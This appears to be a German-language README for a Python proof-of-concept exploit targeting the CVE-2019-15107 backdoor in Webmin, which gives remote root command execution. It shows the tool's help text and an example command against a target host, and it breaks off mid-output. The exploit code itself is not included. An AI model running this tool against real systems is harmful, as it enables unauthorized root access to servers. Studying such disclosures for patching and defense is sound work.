
CVE-2019-15107 Exploit
Webmin Version 1.890 wurde mit einer Hintertür veröffentlicht, die es jedem, der davon weiß, ermöglicht, Befehle als root auszuführen. Die Versionen 1.900 bis 1.920 enthielten ebenfalls eine Hintertür mit ähnlichem Code, die jedoch in einer Standard-Webmin-Installation nicht ausnutzbar war. Nur wenn der Administrator die Funktion unter Webmin -> Webmin-Konfiguration -> Authentifizierung aktiviert hatte, um das Ändern abgelaufener Passwörter zu erlauben, konnte sie von einem Angreifer genutzt werden.
Sie benötigen pip3, um diese Pakete zu installieren.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[